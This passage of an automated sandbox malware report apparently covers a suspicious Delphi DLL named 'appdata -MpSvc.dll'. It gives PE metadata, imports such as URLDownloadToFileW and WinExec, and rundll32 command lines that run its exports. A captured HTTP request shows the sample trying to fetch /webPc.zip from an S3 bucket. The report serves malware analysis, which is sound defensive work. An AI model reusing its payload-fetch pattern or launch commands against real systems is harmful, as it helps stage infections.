                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x24d3100x24d40088c3eda7ab2c914c2a9c5a5264606dabunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0x24f0000x18b00x1a00a0dbfab2a75d6871c6c2fd045fb0b7e2False0.5171274038461539data6.1638649467993485IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0x2510000x8eac0x90006bc1cd1916205358cb83ad1716ba5a53False0.5597059461805556data6.102741094473156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0x25a0000x6d4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0x2610000x3f000x40000b256511ccbf3690e4608b76222cb9d6False0.30609130859375data5.133668405694886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0x2650000xac60xc005d7ace3d0cc4aba26eb6a03d4ed33b64False0.3277994791666667data3.924768163545641IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0x2660000xd20x2007baa57fb3a575a2793f3eca6fe25464fFalse0.353515625data2.5812448053415076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rdata0x2670000x440x200c9f8bfa36b2dc5163b75d3196d251b45False0.15625data1.1660636886017055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x2680000x352e00x354006f0174c94dbdb677a8c35c4bea9ef968False0.561656396713615data6.7153508191439295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0x29e0000xc8000xc800042c0351f4331fdf7d6d9f7df2537c05False0.2859765625data4.749895191517642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_CURSOR0x29ed740x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                            RT_CURSOR0x29eea80x134dataEnglishUnited States0.4642857142857143
                            RT_CURSOR0x29efdc0x134dataEnglishUnited States0.4805194805194805
                            RT_CURSOR0x29f1100x134dataEnglishUnited States0.38311688311688313
                            RT_CURSOR0x29f2440x134dataEnglishUnited States0.36038961038961037
                            RT_CURSOR0x29f3780x134dataEnglishUnited States0.4090909090909091
                            RT_CURSOR0x29f4ac0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                            RT_BITMAP0x29f5e00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                            RT_BITMAP0x29f7b00x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                            RT_BITMAP0x29f9940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                            RT_BITMAP0x29fb640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                            RT_BITMAP0x29fd340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                            RT_BITMAP0x29ff040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                            RT_BITMAP0x2a00d40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                            RT_BITMAP0x2a02a40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                            RT_BITMAP0x2a04740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                            RT_BITMAP0x2a06440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                            RT_BITMAP0x2a08140x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colorsEnglishUnited States0.5197368421052632
                            RT_BITMAP0x2a08ac0x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colorsEnglishUnited States0.506578947368421
                            RT_STRING0x2a09440xb08data0.2730169971671388
                            RT_STRING0x2a144c0x898data0.28863636363636364
                            RT_STRING0x2a1ce40x368data0.32798165137614677
                            RT_STRING0x2a204c0x434data0.40427509293680297
                            RT_STRING0x2a24800x1b0data0.5532407407407407
                            RT_STRING0x2a26300xccdata0.6666666666666666
                            RT_STRING0x2a26fc0x28cdata0.4294478527607362
                            RT_STRING0x2a29880x160data0.5454545454545454
                            RT_STRING0x2a2ae80x350data0.42806603773584906
                            RT_STRING0x2a2e380x414data0.3611111111111111
                            RT_STRING0x2a324c0x358data0.3820093457943925
                            RT_STRING0x2a35a40x4f8data0.3026729559748428
                            RT_STRING0x2a3a9c0x2c4data0.3375706214689266
                            RT_STRING0x2a3d600x3c0data0.428125
                            RT_STRING0x2a41200x434data0.3745353159851301
                            RT_STRING0x2a45540x4ccdata0.3713355048859935
                            RT_STRING0x2a4a200x454data0.3303249097472924
                            RT_STRING0x2a4e740x38cdata0.3535242290748899
                            RT_STRING0x2a52000x450data0.3858695652173913
                            RT_STRING0x2a56500x200data0.412109375
                            RT_STRING0x2a58500xc4data0.6428571428571429
                            RT_STRING0x2a59140x170data0.5597826086956522
                            RT_STRING0x2a5a840x334data0.41585365853658535
                            RT_STRING0x2a5db80x408data0.3168604651162791
                            RT_STRING0x2a61c00x38cdata0.3876651982378855
                            RT_STRING0x2a654c0x2b4data0.4263005780346821
                            RT_RCDATA0x2a68000x10data1.5
                            RT_RCDATA0x2a68100x74cdata0.5321199143468951
                            RT_RCDATA0x2a6f5c0x2dataEnglishUnited States5.0
                            RT_RCDATA0x2a6f600x122aDelphi compiled form 'TF_LicenseGen'0.37827956989247313
                            RT_RCDATA0x2a818c0xa6bDelphi compiled form 'TF_MatchMerge'0.44169478815148105
                            RT_RCDATA0x2a8bf80xa66Delphi compiled form 'TMainForm'0.4560480841472577
                            RT_RCDATA0x2a96600x981Delphi compiled form 'TRulesForm'0.5187011919441019
                            RT_RCDATA0x2a9fe40x363Delphi compiled form 'TStats'0.5686274509803921
                            RT_GROUP_CURSOR0x2aa3480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                            RT_GROUP_CURSOR0x2aa35c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                            RT_GROUP_CURSOR0x2aa3700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x2aa3840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x2aa3980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x2aa3ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x2aa3c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_VERSION0x2aa3d40x23cdataEnglishUnited States0.4493006993006993
                            DLLImport
                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                            user32.dllCharNextW, LoadStringW
                            kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
                            kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc, FreeLibrary
                            user32.dllSetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExW, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaW, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DeferWindowPos, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, BeginDeferWindowPos, AdjustWindowRectEx, ActivateKeyboardLayout
                            gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                            version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                            kernel32.dllWriteFile, WinExec, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, TerminateProcess, SystemTimeToFileTime, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OpenProcess, MulDiv, MoveFileW, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
                            advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                            kernel32.dllSleep
                            netapi32.dllNetApiBufferFree, NetWkstaGetInfo
                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                            oleaut32.dllGetErrorInfo, SysFreeString
                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                            comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                            user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                            msvcrt.dllmemset, memcpy
                            shell32.dllShellExecuteExW, ShellExecuteW, Shell_NotifyIconW
                            URLMON.DLLURLDownloadToFileW
                            comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                            winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                            winspool.drvGetDefaultPrinterW
                            kernel32.dllMulDiv
                            shell32.dllIsUserAnAdmin
                            NameOrdinalAddress
                            HackCheck50x647184
                            ServiceCrtMain40x647184
                            TMethodImplementationIntercept30x4662f8
                            __dbk_fcall_wrapper20x41188c
                            dbkFCallWrapperAddr10x65d634
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 8, 2024 19:51:54.899823904 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:54.899861097 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:54.899934053 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:54.909512997 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:54.909549952 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:55.920988083 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:55.921106100 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.002196074 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.002230883 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:56.003284931 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:56.003405094 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.006613016 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.048268080 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:56.337786913 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:56.337861061 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.337919950 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:56.338114977 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.338125944 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:56.338162899 CET443497163.5.234.32192.168.2.5
                            Mar 8, 2024 19:51:56.338171959 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.338215113 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.340034962 CET49716443192.168.2.53.5.234.32
                            Mar 8, 2024 19:51:56.340046883 CET443497163.5.234.32192.168.2.5
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 8, 2024 19:51:54.683963060 CET5264853192.168.2.51.1.1.1
                            Mar 8, 2024 19:51:54.886970043 CET53526481.1.1.1192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 8, 2024 19:51:54.683963060 CET192.168.2.51.1.1.10xe75aStandard query (0)awsserver903203232.s3.sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)awsserver903203232.s3.sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.234.32A (IP address)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.22A (IP address)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.50A (IP address)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.10A (IP address)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.62A (IP address)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.164A (IP address)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.130A (IP address)IN (0x0001)false
                            Mar 8, 2024 19:51:54.886970043 CET1.1.1.1192.168.2.50xe75aNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.162A (IP address)IN (0x0001)false
                            • awsserver903203232.s3.sa-east-1.amazonaws.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.5497163.5.234.324437524C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-03-08 18:51:56 UTC314OUTGET /webPc.zip HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: awsserver903203232.s3.sa-east-1.amazonaws.com
                            Connection: Keep-Alive
                            2024-03-08 18:51:56 UTC305INHTTP/1.1 404 Not Found
                            x-amz-request-id: K2HKDGME41DR45HN
                            x-amz-id-2: vHV/b8VcumvIbfDGSDiVJ5K+95bt7FgHQCKQRQmubVkMWPewHm15YRYSdoTHyYBv1q62H1Rn2S3hhiPydHGYplaW7V0UmA6n
                            Content-Type: application/xml
                            Transfer-Encoding: chunked
                            Date: Fri, 08 Mar 2024 18:51:55 GMT
                            Server: AmazonS3
                            Connection: close
                            2024-03-08 18:51:56 UTC335INData Raw: 31 34 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 62 75 63 6b 65 74 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 4d 65 73 73 61 67 65 3e 3c 42 75 63 6b 65 74 4e 61 6d 65 3e 61 77 73 73 65 72 76 65 72 39 30 33 32 30 33 32 33 32 3c 2f 42 75 63 6b 65 74 4e 61 6d 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 4b 32 48 4b 44 47 4d 45 34 31 44 52 34 35 48 4e 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 76 48 56 2f 62 38 56 63 75 6d 76 49 62 66 44 47 53 44 69 56 4a 35 4b 2b 39 35 62 74 37 46 67 48 51 43 4b
                            Data Ascii: 148<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>awsserver903203232</BucketName><RequestId>K2HKDGME41DR45HN</RequestId><HostId>vHV/b8VcumvIbfDGSDiVJ5K+95bt7FgHQCK
                            2024-03-08 18:51:56 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:19:51:43
                            Start date:08/03/2024
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll"
                            Imagebase:0xf90000
                            File size:126'464 bytes
                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:19:51:43
                            Start date:08/03/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:19:51:43
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:19:51:43
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:19:51:43
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:19:51:43
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 692
                            Imagebase:0x650000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:19:51:46
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:19:51:49
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:19:51:52
                            Start date:08/03/2024
